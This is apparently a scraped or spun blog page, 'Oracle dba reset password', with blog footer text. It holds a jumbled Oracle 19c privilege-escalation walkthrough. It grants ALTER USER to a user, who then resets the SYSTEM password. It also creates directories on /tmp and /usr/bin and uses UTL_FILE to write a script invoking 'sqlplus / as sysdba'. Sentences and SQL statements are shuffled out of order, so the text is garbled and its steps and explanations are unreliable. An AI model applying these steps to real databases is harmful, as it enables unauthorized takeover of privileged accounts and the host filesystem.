12/17/2023 0 Comments Oracle dba reset password quote![]() SQL> select USERNAME, SYSDBA from v$pwfile_users Utl_file.put(fhandle, 'sqlplus / as sysdba CREATE TABLE exploit_table (c1 varchar2(2000))Īnd here comes the fun part: SQL> select USERNAME, SYSDBA from v$pwfile_users Utl_file.put(fhandle, 'export ORACLE_SID=RYMIN19' || CHR(10)) Utl_file.put(fhandle, 'export PATH=$ORACLE_HOME/bin:$PATH' || CHR(10)) SQL> create directory exploitd2 as '/usr/bin' įhandle := utl_file.fopen('EXPLOITD1', 'data.txt', 'w') ![]() SQL> create directory exploitd1 as '/tmp' SYS_CONTEXT ('USERENV','INSTANCE_NAME') as instance from dual SQL> select SYS_CONTEXT ('USERENV','ORACLE_HOME') as home, This already provides read/write access to the filesystem as database user. That was all it took to gain access to SYSTEM or any other privileged user besides SYS. SQL> alter user system identified by system SQL> grant create session, alter user to u1 Oracle Database 19c Enterprise Edition Release 19.0.0.0.0 - Production By doing that, you also grant unlimited access indirectly to that user in most databases, which you wanted to avoid. You may grant ALTER USER and CREATE USER to that user to get this done.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |